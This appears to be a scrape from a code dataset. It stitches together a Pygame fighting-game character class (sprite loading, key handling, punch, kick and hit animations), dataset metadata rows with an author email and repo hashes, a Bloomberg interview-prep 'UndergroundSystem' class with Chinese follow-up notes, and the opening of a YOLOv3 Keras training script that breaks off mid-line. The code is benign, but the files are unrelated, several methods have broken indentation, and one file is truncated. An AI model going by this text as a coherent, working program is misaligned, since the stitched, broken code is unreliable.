self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Apunch.png', self.punchLimit[0]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Bpunch.png', self.punchLimit[1]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Cpunch.png', self.punchLimit[2]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Dpunch.png', self.punchLimit[3]))
# Kick sprites
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Akick.png', self.kickLimit[0]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Bkick.png', self.kickLimit[1]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ckick.png', self.kickLimit[2]))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Dkick.png', self.kickLimit[3]))
# Hit sprites
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ahit.png', self.hitLimit[0])) # soco fraco
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Bhit.png', self.hitLimit[1])) # chute fraco
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Chit.png', self.hitLimit[2])) # soco forte
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Dhit.png', self.hitLimit[3])) # chute agrachado fraco
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ehit.png', self.hitLimit[4])) # soco agachado fraco
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Fhit.png', self.hitLimit[5])) # chute forte e soco forte agachado (gancho)
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ghit.png', self.hitLimit[6])) # chute agachado forte: banda
#self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Hhit.png', self.hitLimit[7])) # specialMove
# blocking sprites
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Ablock.png', self.blockLimit)) # defesa em pé
#self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Bblock.png', self.blockLimit)) # defesa agachado
# special sprite ----------------------------------
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/Special.png', self.specialLimit[self.fighterId])) # Especial
self.act()
    def act(self):
        """Reset all animation counters and state flags to the idle pose.

        Called once from __init__; leaves the fighter dancing in place.
        """
        # Combat control
        # NOTE(review): the locals below are never stored on self and are
        # therefore dead code -- presumably they were meant to be instance
        # attributes; confirm before relying on them.
        combat = False
        block = False
        alive = False
        fatality = False
        dizzyCounter = 1
        dizzyCounterAux = 1
        fatalityCounter = 8
        fatalityCounterAux = 1
        # Control reflection var
        reflection = False
        # Dance vars
        self.dancing = True
        self.frame_dance = 0
        self.dance_step = 1
        # Walk vars
        self.frame_walk = 0
        self.walking = False  # status flag
        # Jump vars
        self.jumpHeight = 10 # jump height
        self.jumpCounter = 1 # counter tracking the rise and fall of the jump
        self.jumping = False # status flag
        self.frame_jumping = 0
        self.jump_step = 1
        self.end_jump = True
        # Crouch vars
        self.crouching = False # status flag
        self.frame_crouching = 0
        self.crouch_step = 1
        # Punch vars
        self.Apunching = False
        self.frame_Apunching = 0
        self.Apunch_step = 1
        self.end_Apunch = True
        self.Bpunching = False
        self.frame_Bpunching = 0
        self.Bpunch_step = 1
        self.end_Bpunch = True
        self.Cpunching = False
        self.frame_Cpunching = 0
        self.Cpunch_step = 1
        self.end_Cpunch = True
        self.Dpunching = False
        self.frame_Dpunching = 0
        self.Dpunch_step = 1
        self.end_Dpunch = True
        # Kick vars
        self.Akicking = False
        self.frame_Akicking = 0
        self.Akick_step = 1
        self.end_Akick = True
        self.Bkicking = False
        self.frame_Bkicking = 0
        self.Bkick_step = 1
        self.end_Bkick = True
        self.Ckicking = False
        self.frame_Ckicking = 0
        self.Ckick_step = 1
        self.end_Ckick = True
        self.Dkicking = False
        self.frame_Dkicking = 0
        self.Dkick_step = 1
        self.end_Dkick = True
        # Blocking vars
        self.Ablocking = False
        self.frame_Ablocking = 0
        self.Ablock_step = 1
        self.Bblocking = False
        # Special vars
        self.specialMove = False
        self.end_special = True
        self.frame_special = 0
        self.special_step = 1
        # Hit vars
        self.hit = False
        self.downHit = False
        self.hitName = ""
        self.Ahitting = False
        self.Bhitting = False
        self.Chitting = False
        self.Dhitting = False
        self.Ehitting = False
        self.Fhitting = False
        self.Ghitting = False
        self.Hhitting = False
        self.frame_Ahit = 0
        self.frame_Bhit = 0
        self.frame_Chit = 0
        self.frame_Dhit = 0
        self.frame_Ehit = 0
        self.frame_Fhit = 0
        self.frame_Ghit = 0
        self.frame_Hhit = 0
        self.hit_step = 1
        # Life Vars
        # NOTE(review): these are also dead locals (never stored on self).
        X_inicio = 37
        X_atual = X_inicio
        X_fim = X_inicio + 327
        self.posFighter()
    def fight(self, time, nextFrame):
        """Advance this fighter by one iteration of the fight loop.

        Reads the keyboard, selects the branch matching the current
        input/hit state, moves and animates the matching sprite sheet.

        - time: current clock value supplied by the caller
        - nextFrame: timestamp at which the next animation frame is due
        Returns the (possibly advanced) nextFrame timestamp.
        """
        frame_step = 60  # time units between animation frames
        if not self.jumping:
            # fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> jump
            if keyPressed(self.move[0]) and not self.hit:
                self.jumping = True
                self.end_jump = False
                self.curr_sprite = self.spriteList[self.jump]
            # fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> right
            elif keyPressed(self.move[3]) and not self.hit:
                self.curr_sprite = self.spriteList[self.walk]
                self.walking = self.setState()
                self.setEndState()
                self.x += 6
                moveSprite(self.spriteList[self.walk], self.x, self.y, True)
                self.setSprite(self.spriteList[self.walk])
                changeSpriteImage(self.spriteList[self.walk], self.frame_walk)
                if time > nextFrame:
                    # There are 9 frames of animation in each direction
                    self.frame_walk = (self.frame_walk+1) % self.walkLimit
                    # so the modulus 9 allows it to loop
                    nextFrame += frame_step
            # fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> left
            elif keyPressed(self.move[2]) and not self.hit:# SECOND CHANGE (was: and not self.jumping:)
                self.curr_sprite = self.spriteList[self.walk]
                self.walking = self.setState()
                self.setEndState()
                self.x -= 6
                moveSprite(self.spriteList[self.walk], self.x, self.y, True)
                self.setSprite(self.spriteList[self.walk])
                # walking left plays the sheet backwards
                changeSpriteImage(self.spriteList[self.walk], self.walkLimit-1-self.frame_walk)
                if time > nextFrame:
                    # There are 9 frames of animation in each direction
                    self.frame_walk = (self.frame_walk+1) % self.walkLimit
                    nextFrame += frame_step
            # fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> crouch
            elif (keyPressed(self.move[1]) and not self.hit) or self.downHit:
                if self.end_Cpunch and self.end_Dpunch and self.end_Ckick and self.end_Dkick and not self.hit and not self.downHit:
                    self.curr_sprite = self.spriteList[self.crouch]
                    self.crouching = self.setState()
                    self.setEndState()
                if time > nextFrame:
                    if self.end_Cpunch and self.end_Dpunch and self.end_Ckick and self.end_Dkick and not self.hit and not self.downHit:
                        moveSprite(self.spriteList[self.crouch], self.x, self.y, True)
                        self.setSprite(self.spriteList[self.crouch])
                        changeSpriteImage(self.spriteList[self.crouch], self.frame_crouching)
                        self.frame_crouching = (self.frame_crouching+self.crouch_step) % self.crouchLimit
                        if self.frame_crouching == self.crouchLimit - 2:
                            # hold the final crouch pose
                            self.crouch_step = 0
                # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> crouch and jab
                if ( (keyPressed(self.combat[0]) and self.end_Cpunch) or (not self.end_Cpunch) ) and (not self.hit) and not self.downHit:
                    self.curr_sprite = self.spriteList[self.Cpunch]
                    self.Cpunching = self.setState()
                    self.setEndState()
                    self.end_Cpunch = False
                    if time > nextFrame:
                        moveSprite(self.spriteList[self.Cpunch], self.x, self.y, True)
                        self.setSprite(self.spriteList[self.Cpunch])
                        changeSpriteImage(self.spriteList[self.Cpunch], self.frame_Cpunching)
                        self.frame_Cpunching = (self.frame_Cpunching+self.Cpunch_step) % (self.punchLimit[2]+1)
                        if (self.frame_Cpunching == self.punchLimit[2]-1):
                            # play the sheet back out in reverse
                            self.Cpunch_step = -1
                        if (self.frame_Cpunching == self.punchLimit[2]):
                            self.frame_Cpunching = 0
                            self.Cpunch_step = 1
                            self.end_Cpunch = True
                # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> crouch and strong punch
                elif ( (keyPressed(self.combat[1]) and self.end_Dpunch) or ( not self.end_Dpunch) ) and (not self.hit) and not self.downHit:
                    self.curr_sprite = self.spriteList[self.Dpunch]
                    self.Dpunching = self.setState()
                    self.setEndState()
                    self.end_Dpunch = False
                    if time > nextFrame:
                        moveSprite(self.spriteList[self.Dpunch], self.x, self.y, True)
                        self.setSprite(self.spriteList[self.Dpunch])
                        changeSpriteImage(self.spriteList[self.Dpunch], self.frame_Dpunching)
                        self.frame_Dpunching = (self.frame_Dpunching+self.Dpunch_step) % (self.punchLimit[3]+1)
                        if (self.frame_Dpunching == self.punchLimit[3]-1):
                            self.Dpunch_step = -1
                        if (self.frame_Dpunching == self.punchLimit[3]):
                            self.frame_Dpunching = 0
                            self.Dpunch_step = 1
                            self.end_Dpunch = True
                # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> crouch and kick
                elif ( (keyPressed(self.combat[2]) and self.end_Ckick) or ( not self.end_Ckick) ) and (not self.hit) and not self.downHit:
                    self.curr_sprite = self.spriteList[self.Ckick]
                    self.Ckicking = self.setState()
                    self.end_Ckick = self.setEndState()
                    if time > nextFrame:
                        moveSprite(self.spriteList[self.Ckick], self.x, self.y, True)
                        self.setSprite(self.spriteList[self.Ckick])
                        changeSpriteImage(self.spriteList[self.Ckick], self.frame_Ckicking)
                        self.frame_Ckicking = (self.frame_Ckicking+self.Ckick_step) % (self.kickLimit[2]+1)
                        if (self.frame_Ckicking == self.kickLimit[2]-1):
                            self.Ckick_step = -1
                        if (self.frame_Ckicking == self.kickLimit[2]):
                            self.frame_Ckicking = 0
                            self.Ckick_step = 1
                            self.end_Ckick = True
                # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> Crouch and strong kick
                elif ( (keyPressed(self.combat[3]) and self.end_Dkick) or ( not self.end_Dkick) ) and (not self.hit) and not self.downHit:
                    self.curr_sprite = self.spriteList[self.Dkick]
                    self.Dkicking = self.setState()
                    self.end_Dkick = self.setEndState()
                    if time > nextFrame:
                        moveSprite(self.spriteList[self.Dkick], self.x, self.y, True)
                        self.setSprite(self.spriteList[self.Dkick])
                        changeSpriteImage(self.spriteList[self.Dkick], self.frame_Dkicking)
                        self.frame_Dkicking = (self.frame_Dkicking+self.Dkick_step) % self.kickLimit[3]
                        if (self.frame_Dkicking == 0):
                            self.end_Dkick = True
                #-------------- hits taken while crouching --------------------
                #Hhit = 19 # specialMove
                #BblockHit = 21 crouching block hit
                #Ehit = 16 # weak crouching kick or punch
                elif self.downHit and self.hitName == "Ehit":
                    self.curr_sprite = self.spriteList[self.Ehit]
                    self.Ehitting = self.setState()
                    self.crouching = True
                    moveSprite(self.spriteList[self.Ehit], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.Ehit])
                    changeSpriteImage(self.spriteList[self.Ehit], self.frame_Ehit)
                    if time > nextFrame:
                        self.frame_Ehit = (self.frame_Ehit+self.hit_step) % self.hitLimit[4]
                        if (self.frame_Ehit == self.hitLimit[4] - 1):
                            self.hit_step = -1
                        if (self.frame_Ehit == 0):
                            self.hit_step = 1
                            self.downHit = False
                elif self.downHit and self.hitName == "Bblocking":
                    # NOTE(review): self.Bblock is commented out on the class;
                    # reaching this branch would raise AttributeError -- confirm.
                    self.curr_sprite = self.spriteList[self.Bblock]
                    self.Ablocking = self.setState()
                    if time > nextFrame:
                        moveSprite(self.spriteList[self.Ablock], self.x, self.y, True)
                        self.setSprite(self.spriteList[self.Ablock])
                        changeSpriteImage(self.spriteList[self.Ablock], self.frame_Ablocking)
                        self.frame_Ablocking = (self.frame_Ablocking+self.hit_step) % self.blockLimit
                        if self.frame_Ablocking == self.blockLimit - 1:
                            self.hit_step = -1
                        if self.frame_Ablocking == 1:
                            self.hit_step = 1
                            self.hit = False
                        nextFrame += 1*frame_step
            # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> jab
            elif ((keyPressed(self.combat[0]) and self.end_Apunch) or ( not self.end_Apunch) ) and (not self.hit) :
                # NOTE(review): debug print left in the hot loop -- remove?
                print("flag!")
                self.curr_sprite = self.spriteList[self.Apunch]
                self.Apunching = self.setState()
                self.setEndState()
                self.end_Apunch = False
                if time > nextFrame:
                    moveSprite(self.spriteList[self.Apunch], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.Apunch])
                    changeSpriteImage(self.spriteList[self.Apunch], self.frame_Apunching)
                    self.frame_Apunching = (self.frame_Apunching+self.Apunch_step) % (self.punchLimit[0]+1)
                    if (self.frame_Apunching == self.punchLimit[0]-1):
                        self.Apunch_step = -1
                    if (self.frame_Apunching == self.punchLimit[0]):
                        self.frame_Apunching = 0
                        self.Apunch_step = 1
                        self.end_Apunch = True
                    nextFrame += 1*frame_step
            # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> strong punch
            elif ( (keyPressed(self.combat[1]) and self.end_Bpunch) or ( not self.end_Bpunch) ) and (not self.hit) :
                self.curr_sprite = self.spriteList[self.Bpunch]
                self.Bpunching = self.setState()
                self.end_Bpunch = self.setEndState()
                if time > nextFrame:
                    moveSprite(self.spriteList[self.Bpunch], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.Bpunch])
                    changeSpriteImage(self.spriteList[self.Bpunch], self.frame_Bpunching)
                    self.frame_Bpunching = (self.frame_Bpunching+self.Bpunch_step) % self.punchLimit[1]
                    if (self.frame_Bpunching == 0):
                        self.end_Bpunch = True
                    nextFrame += 1*frame_step
            # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> kick
            elif ( (keyPressed(self.combat[2]) and self.end_Akick) or ( not self.end_Akick) ) and (not self.hit):
                self.curr_sprite = self.spriteList[self.Akick]
                self.Akicking = self.setState()
                self.end_Akick = self.setEndState()
                if time > nextFrame:
                    moveSprite(self.spriteList[self.Akick], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.Akick])
                    changeSpriteImage(self.spriteList[self.Akick], self.frame_Akicking)
                    self.frame_Akicking = (self.frame_Akicking+self.Akick_step) % (self.kickLimit[0]+1)
                    if (self.frame_Akicking == self.kickLimit[0]-1):
                        self.Akick_step = -1
                    if (self.frame_Akicking == self.kickLimit[0]):
                        self.frame_Akicking = 0
                        self.Akick_step = 1
                        self.end_Akick = True
                    nextFrame += 1*frame_step
            # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> strong kick
            elif ( (keyPressed(self.combat[3]) and self.end_Bkick) or ( not self.end_Bkick) ) and (not self.hit):
                self.curr_sprite = self.spriteList[self.Bkick]
                self.Bkicking = self.setState()
                self.end_Bkick = self.setEndState()
                if time > nextFrame:
                    moveSprite(self.spriteList[self.Bkick], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.Bkick])
                    changeSpriteImage(self.spriteList[self.Bkick], self.frame_Bkicking)
                    self.frame_Bkicking = (self.frame_Bkicking+self.Bkick_step) % self.kickLimit[1]
                    if (self.frame_Bkicking == 0):
                        self.end_Bkick = True
                    nextFrame += 1*frame_step
            # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> standing block
            elif keyPressed(self.combat[5]) and not self.hit:
                self.curr_sprite = self.spriteList[self.Ablock]
                self.Ablocking = self.setState()
                self.setEndState()
                if time > nextFrame:
                    moveSprite(self.spriteList[self.Ablock], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.Ablock])
                    changeSpriteImage(self.spriteList[self.Ablock], self.frame_Ablocking)
                    self.frame_Ablocking = (self.frame_Ablocking+self.Ablock_step) % self.blockLimit
                    if self.frame_Ablocking == self.blockLimit - 2:
                        # hold the block pose while the key stays down
                        self.Ablock_step = 0
                    nextFrame += 1*frame_step
            # combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]] -> special move
            elif ((keyPressed(self.combat[4]) and self.end_special) or ( not self.end_special) ) and (not self.hit):
                # NOTE(review): debug print left in the hot loop -- remove?
                print("SpecialMove")
                self.curr_sprite = self.spriteList[self.special]
                self.specialMove = self.setState()
                self.setEndState()
                self.end_special = False
                if time > nextFrame:
                    moveSprite(self.spriteList[self.special], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.special])
                    changeSpriteImage(self.spriteList[self.special], self.frame_special)
                    self.frame_special = (self.frame_special+self.special_step) % (self.specialLimit[self.fighterId]+1)
                    if (self.frame_special == self.specialLimit[self.fighterId]-1):
                        self.special_step = -1
                    if (self.frame_special == self.specialLimit[self.fighterId]):
                        self.frame_special = 0
                        self.special_step = 1
                        self.end_special = True
                    nextFrame += 1*frame_step
            # just dance :)
            elif not self.hit:
                # reset block (hold type)
                self.frame_Ablocking = 0
                self.Ablock_step = 1
                # reset down (hold type)
                self.frame_crouching = 0
                self.crouch_step = 1
                # reset other movement
                self.frame_walk = self.frame_jumping = 0
                # reset combat frames
                self.frame_Apunching = self.frame_Bpunching = self.frame_Cpunching = self.frame_Dpunching = self.frame_Akicking = self.frame_Bkicking = self.frame_Ckicking = self.frame_Dkicking = 0
                self.setEndState()
                # start to dance
                self.curr_sprite = self.spriteList[self.dance]
                self.dancing = self.setState()
                if time > nextFrame:
                    moveSprite(self.spriteList[self.dance], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.dance])
                    changeSpriteImage(self.spriteList[self.dance], self.frame_dance)
                    self.frame_dance = (self.frame_dance+self.dance_step) % self.danceLimit
                    if (self.frame_dance == self.danceLimit-1):
                        self.dance_step = -1
                    if (self.frame_dance == 0):
                        self.dance_step = 1
                    nextFrame += frame_step
            #-------------- hits taken while standing --------------------
            #Hhit = 19 # specialMove
            #BblockHit = 21 crouching block hit
            # Ouch! Punch on a face (Ahit = 12 # weak punch)
            elif self.hit and self.hitName == "Apunching":
                self.curr_sprite = self.spriteList[self.Ahit]
                self.Ahitting = self.setState()
                moveSprite(self.spriteList[self.Ahit], self.x, self.y, True)
                self.setSprite(self.spriteList[self.Ahit])
                changeSpriteImage(self.spriteList[self.Ahit], self.frame_Ahit)
                if time > nextFrame:
                    self.frame_Ahit = (self.frame_Ahit+self.hit_step) % self.hitLimit[0]
                    if (self.frame_Ahit == self.hitLimit[0] - 1):
                        self.hit_step = -1
                    if (self.frame_Ahit == 0):
                        self.hit_step = 1
                        self.hit = False
                    nextFrame += 1.2*frame_step
            # Ouch! kick on a face (Bhit = 13 # weak kick)
            elif self.hit and self.hitName == "Akicking":
                self.curr_sprite = self.spriteList[self.Bhit]
                self.Bhitting = self.setState()
                # knockback: push away from the attacker
                if self.fighterId == 0:
                    self.x -=0.8
                else: self.x +=0.8
                moveSprite(self.spriteList[self.Bhit], self.x, self.y, True)
                self.setSprite(self.spriteList[self.Bhit])
                changeSpriteImage(self.spriteList[self.Bhit], self.frame_Bhit)
                if time > nextFrame:
                    # There are 8 frames of animation in each direction
                    self.frame_Bhit = (self.frame_Bhit+self.hit_step) % self.hitLimit[1]
                    if (self.frame_Bhit == self.hitLimit[1] - 1):
                        self.hit_step = -1
                    if (self.frame_Bhit == 0):
                        self.hit_step = 1
                        self.hit = False
                    nextFrame += 1.2*frame_step
            # Ouch! combo punch (Chit = 14 # strong punch)
            elif self.hit and self.hitName == "Bpunching":
                self.curr_sprite = self.spriteList[self.Chit]
                self.Chitting = self.setState()
                if self.fighterId == 0:
                    self.x -=2
                else: self.x +=2
                moveSprite(self.spriteList[self.Chit], self.x, self.y, True)
                self.setSprite(self.spriteList[self.Chit])
                changeSpriteImage(self.spriteList[self.Chit], self.frame_Chit)
                if time > nextFrame:
                    self.frame_Chit = (self.frame_Chit+self.hit_step) % self.hitLimit[2]
                    if (self.frame_Chit == self.hitLimit[2] - 1):
                        self.hit_step = -1
                    if (self.frame_Chit == 0):
                        self.hit_step = 1
                        self.hit = False
                    nextFrame += 1.2*frame_step
            #Dhit = 15 # weak crouching punch
            elif self.hit and self.hitName == "Cpunching":
                self.curr_sprite = self.spriteList[self.Dhit]
                self.Dhitting = self.setState()
                moveSprite(self.spriteList[self.Dhit], self.x, self.y, True)
                self.setSprite(self.spriteList[self.Dhit])
                changeSpriteImage(self.spriteList[self.Dhit], self.frame_Dhit)
                if time > nextFrame:
                    self.frame_Dhit = (self.frame_Dhit+self.hit_step) % self.hitLimit[3]
                    if (self.frame_Dhit == self.hitLimit[3] - 1):
                        self.hit_step = -1
                    if (self.frame_Dhit == 0):
                        self.hit_step = 1
                        self.hit = False
                    nextFrame += 1.2*frame_step
            #Fhit = 17 # strong kick and strong crouching punch (uppercut)
            elif self.hit and self.hitName == "Bkicking":
                self.curr_sprite = self.spriteList[self.Fhit]
                self.Fhitting = self.setState()
                # strong knockback during the first frames only
                if self.frame_Fhit <= 6:
                    if self.fighterId == 0:
                        self.x -=5
                    else: self.x +=5
                moveSprite(self.spriteList[self.Fhit], self.x, self.y, True)
                self.setSprite(self.spriteList[self.Fhit])
                changeSpriteImage(self.spriteList[self.Fhit], self.frame_Fhit)
                if time > nextFrame:
                    self.frame_Fhit = (self.frame_Fhit+self.hit_step) % self.hitLimit[5]
                    if (self.frame_Fhit == self.hitLimit[5] - 1):
                        self.hit = False
                    nextFrame += 1.2*frame_step
            #Ghit = 18 # strong crouching kick: sweep
            elif self.hit and self.hitName == "Dkicking":
                self.curr_sprite = self.spriteList[self.Ghit]
                self.Ghitting = self.setState()
                moveSprite(self.spriteList[self.Ghit], self.x, self.y, True)
                self.setSprite(self.spriteList[self.Ghit])
                changeSpriteImage(self.spriteList[self.Ghit], self.frame_Ghit)
                if time > nextFrame:
                    self.frame_Ghit = (self.frame_Ghit+self.hit_step) % self.hitLimit[6]
                    if (self.frame_Ghit == self.hitLimit[6] - 1):
                        self.hit = False
                    nextFrame += 1.2*frame_step
            # blockHit! Standing block.
            elif self.hit and self.hitName == "Ablocking":
                self.curr_sprite = self.spriteList[self.Ablock]
                self.Ablocking = self.setState()
                if time > nextFrame:
                    moveSprite(self.spriteList[self.Ablock], self.x, self.y, True)
                    self.setSprite(self.spriteList[self.Ablock])
                    changeSpriteImage(self.spriteList[self.Ablock], self.frame_Ablocking)
                    self.frame_Ablocking = (self.frame_Ablocking+self.hit_step) % self.blockLimit
                    if self.frame_Ablocking == self.blockLimit - 1:
                        self.hit_step = -1
                    if self.frame_Ablocking == 1:
                        self.hit_step = 1
                        self.hit = False
                    nextFrame += 1*frame_step
        else:
            # fightMoves = [ ["w", "s", "a", "d"], ["up", "down", "left", "right"] ] -> jump
            if time > nextFrame:
                # horizontal drift while airborne
                if keyPressed(self.move[2]):
                    self.x -= 15
                if keyPressed(self.move[3]):
                    self.x += 15
                moveSprite(self.spriteList[self.jump], self.x, self.y, True)
                self.setSprite(self.spriteList[self.jump])
                # parabola: rise while counter < jumpHeight, fall afterwards
                self.y -= (self.jumpHeight-self.jumpCounter)*7
                changeSpriteImage(self.spriteList[self.jump], self.frame_jumping)
                if (self.jumpCounter < self.jumpHeight -1 or self.jumpCounter > self.jumpHeight +1): # rising or falling
                    self.frame_jumping = 1
                if (self.jumpHeight - 1 <= self.jumpCounter <= self.jumpHeight + 1): # nearly stopped (apex)
                    self.frame_jumping = 2
                if (self.jumpCounter == 2*self.jumpHeight-1):
                    # landed: reset the jump cycle
                    self.frame_jumping = 0
                    self.jumpCounter = -1
                    if clock() > nextFrame:
                        self.setSprite(self.spriteList[self.jump])
                        changeSpriteImage(self.spriteList[self.jump], self.frame_jumping)
                        moveSprite(self.spriteList[self.jump], self.x, self.y, True)
                    self.end_jump = self.setState()# CHANGE
                    self.jumping = self.setEndState() #CHANGE
                self.jumpCounter += 2
                nextFrame += 1*frame_step
        # keep the window responsive while the fight loop runs
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
        tick(120)
        return nextFrame
    # --- position accessors; the setters also reposition the active sprite ---
    def getX(self):
        return self.x
    def getY(self):
        return self.y
    def setX(self,X):
        self.x = X
        moveSprite(self.curr_sprite,self.x,self.y,True)
    def setY(self,Y):
        self.y = Y
        moveSprite(self.curr_sprite,self.x,self.y,True)
    # --- state predicates: each returns the matching flag set by fight()/act() ---
    def isWalking(self):
        return self.walking
    def isCrouching(self):
        return self.crouching
    def isDancing(self):
        return self.dancing
    def isApunching(self):
        return self.Apunching
    def isBpunching(self):
        return self.Bpunching
    def isCpunching(self):
        return self.Cpunching
    def isDpunching(self):
        return self.Dpunching
    def isAkicking(self):
        return self.Akicking
    def isBkicking(self):
        return self.Bkicking
    def isCkicking(self):
        return self.Ckicking
    def isDkicking(self):
        return self.Dkicking
    def isAblocking(self):
        return self.Ablocking
    def isHit(self):
        return self.hit
def killPlayer(self):
for i in range(0,len(self.spriteList)):
killSprite(self.spriteList[i])
    def currentSprite(self):
        # sprite sheet currently being animated by fight()
        return self.curr_sprite
    def takeHit(self,by):
        # register a standing hit; *by* names the attacker's move (e.g. "Apunching")
        self.hit = True
        self.hitName = by
def takeDownHit(self,by):
self.downHit = True
print("flag")
self.hitName = by
    def stopHit(self):
        # clear the standing-hit state set by takeHit()
        self.hit = False
        self.hitName = ""
def setState(self):
# moves
self.walking = False
self.dancing = False
self.jumping = False
self.crouching = False
# punches
self.Apunching = False
self.Bpunching = False
self.Cpunching = False
self.Dpunching = False
# kicks
self.Akicking = False
self.Bkicking = False
self.Ckicking = False
self.Dkicking = False
# punch hits
self.Ahitting = False
self.Bhitting = False
self.Chitting = False
self.Dhitting = False
self.Ehitting = False
self.Fhitting = False
self.Ghitting = False
self.Hhitting = False
# blocks
self.Ablocking = False
self.Bblocking = False
# special move
self.specialMove = False
# fatality
self.fatality = False
# actual states
return True
def setEndState(self):
self.end_jump = True
self.end_Apunch = True
self.end_Bpunch = True
self.end_Cpunch = True
self.end_Dpunch = True
self.end_Akick = True
self.end_Bkick = True
self.end_Ckick = True
self.end_Dkick = True
self.end_special = True
return False
def setSprite(self, sprite):
    """Show *sprite* and hide every other sprite owned by the fighter.

    Args:
        sprite: the sprite that should become the only visible one.
    """
    # Iterate the list directly instead of indexing via range(len(...)).
    for other in self.spriteList:
        # Keep the original ==-based comparison semantics.
        if not sprite == other:
            hideSprite(other)
    showSprite(sprite)
def posFighter(self):
    """Move all of the fighter's sprites to its current (x, y) position."""
    # Iterate the list directly instead of indexing via range(len(...)).
    for sprite in self.spriteList:
        moveSprite(sprite, self.x, self.y, True)
"matheusvidaldemenezes@gmail.com"
] | matheusvidaldemenezes@gmail.com |
169f65f33b732b562e5b9cf615068dbd751fd4ed | f39c2c500873180d953ab9a7b22a4f6df95fb1c3 | /Bloomberg/Design Underground System.py | 314a6c31b7b94a5f58dc9fbfad3485ba36f8756c | [] | no_license | Jason003/interview | 458516f671d7da0d3585f89b098c5370edcd9f04 | e153306b85c3687b23a332812a0885d25ecce904 | refs/heads/master | 2021-07-15T15:28:07.175276 | 2021-02-05T03:21:59 | 2021-02-05T03:21:59 | 224,898,150 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | '''
经典地铁题,原题解法就不说了,地里也有很多资源。 主要讲下follow up。
国女问了哪些edge case可以导致error, 我说了两种,一是check out的时候id在map中不存在,
二是check out的时候id对应的时间t大于之前之前check in时的时间。国女表示满意,
又问了运行过程中可能出现哪些情况导致地铁出问题。我说可能有些check in了但是把地铁卡弄丢了没有checkout,
id在memory中积压了很多最后导致memory不够。 解决方法是定期检查已经存储的数据,
如果start time间隔很久的就可以直接remove。
三哥也问了一个follow up,因为我在check out的map里存的是route, 如果之后需要该站点名怎么办。
我说在route里可以用station id,然后单独建一个station name到station id的map,三哥表示满意。
'''
import collections
class UndergroundSystem:
def __init__(self):
self.station_time, self.user = collections.defaultdict(list), {}
def checkIn(self, id, stationName, t):
self.user[id] = (stationName, t)
def checkOut(self, id, stationName, t):
self.station_time[self.user[id][0], stationName].append(t - self.user[id][1])
def getAverageTime(self, startStation, endStation):
return sum(self.station_time[startStation, endStation]) / len(self.station_time[startStation, endStation]) | [
"jiefanli97@gmail.com"
] | jiefanli97@gmail.com |
ff684e6ace834d561fb4e69b2849d0dc69da0f9d | 1f07fa171b2407c436baedf7c791af0d6dbcdb68 | /train.py | 84eddb2b5149887e5f2bc036824640f7f5572f3f | [
"MIT"
] | permissive | xiaobingchan/yolov3-keras | 9c17c60ec777d82810decbcfd835bd25e9dded9b | 1649846297811d066d2f857ab0eb0dbb247f67e3 | refs/heads/master | 2023-05-04T17:04:30.742544 | 2021-05-17T01:24:09 | 2021-05-17T01:24:09 | 367,919,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,375 | py | """
Retrain the YOLO model for your own dataset.
"""
import numpy as np
import keras.backend as K
from keras.layers import Input, Lambda
from keras.models import Model
from keras.optimizers import Adam
from keras.callbacks import TensorBoard, ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from yolo3.model import preprocess_true_boxes, yolo_body, tiny_yolo_body, yolo_loss
from yolo3.utils import get_random_data
def _main():
annotation_path = 'train.txt'
log_dir = 'logs/000/'
classes_path = 'model_data/voc_classes.txt'
anchors_path = 'model_data/yolo_anchors.txt'
class_names = get_classes(classes_path)
num_classes = len(class_names)
print("num_classes:"+str(num_classes))
anchors = get_anchors(anchors_path)
input_shape = (416,416) # multiple of 32, hw
is_tiny_version = len(anchors)==6 # default setting
if is_tiny_version:
model = create_tiny_model(input_shape, anchors, num_classes,
